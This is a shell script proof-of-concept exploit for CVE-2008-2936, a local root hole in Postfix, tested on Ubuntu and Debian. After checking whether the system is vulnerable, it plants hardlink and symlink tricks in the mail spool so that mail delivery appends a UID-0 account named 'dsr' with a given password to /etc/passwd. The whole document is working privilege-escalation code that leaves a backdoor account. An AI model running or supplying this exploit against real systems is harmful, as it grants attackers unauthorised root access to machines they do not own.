rs_pocfix.txt

`#!/bin/sh  
#  
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)  
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[email protected]>  
#  
# Tested: Ubuntu / Debian  
#  
# [ Madrid, 30.Aug.2008 ]  
#  
  
# Config  
  
writable_dir=/tmp  
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this  
user=root  
target=/etc/passwd  
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at  
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less  
seconds=3  
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"  
postfix=`which postfix` # /usr/sbin/postfix  
postconf=/usr/sbin/postconf  
postmap=/usr/sbin/postmap  
  
  
# Funcs  
  
quit()  
{  
echo "$1"  
exit  
}  
  
  
# Step 1: is my system vulnerable?  
  
head -n 9 $0 | tail -n 8  
if [ $postfix ] ; then  
echo "[*] Postfix seems to be installed"  
else  
quit "[!] Are you sure Postfix is installed?"  
fi  
  
mkdir -p $writable_dir/pocfix  
touch $writable_dir/pocfix/src  
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1  
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2  
  
if [ -L $writable_dir/pocfix/dst2 ] ; then  
echo "[*] Hardlink to symlink not dereferenced"  
rm -rf $writable_dir/pocfix  
else  
rm -rf $writable_dir/pocfix  
quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"  
fi  
  
if [ -d $spool_dir -a -w $spool_dir ] ; then  
echo "[*] Spool dir is writable"  
else  
quit "[!] Spool dir is not writable"  
fi  
  
if [ -e $spool_dir/$user ] ; then  
rm -f $spool_dir/$user  
echo "[*] Mailbox for \"$user\" found. Trying to delete it"  
  
if [ -e $spool_dir/$user ] ; then  
quit "[!] Couldn't delete it"  
else  
echo "[*] Deletion ok"  
fi  
  
fi  
  
if [ -e $spool_dir/$useful_link_dst ] ; then  
rm -f $spool_dir/$useful_link_dst  
echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"  
  
if [ -e $spool_dir/$useful_link_dst ] ; then  
quit "[!] Couldn't delete it"  
else  
echo "[*] Deletion ok"  
fi  
  
fi  
  
aliases=`$postconf alias_database | cut -d"=" -f2`  
$postconf alias_maps | grep -q $aliases  
if [ $? -eq 0 ] ; then  
if [ $aliases ] ; then  
$postmap -q $user $aliases > /dev/null  
if [ $? -eq 0 ] ; then  
quit "[!] Mail alias for \"$user\" exists"  
fi  
fi  
fi  
  
lda=`$postconf mailbox_command | cut -d"=" -f2`  
if [ $lda ] ; then  
quit "[!] Non-Postfix LDA detected"  
fi   
  
$postconf home_mailbox | grep -q '/$'  
if [ $? -eq 0 ] ; then  
quit "[!] Maildir-style mailbox detected"  
fi  
  
  
# Step 2: Exploiting  
  
ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"  
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"  
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"  
echo "[*] Sending mail ($seconds seconds wait)"  
echo $user_in_passwd | /usr/sbin/sendmail $user  
  
sleep $seconds  
  
diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null  
  
if [ $? -eq 0 ] ; then  
echo "[!] Exploit failed"  
else  
echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"  
fi  
  
rm -f $spool_dir/$user  
rm -f $spool_dir/$useful_link_dst  
  
`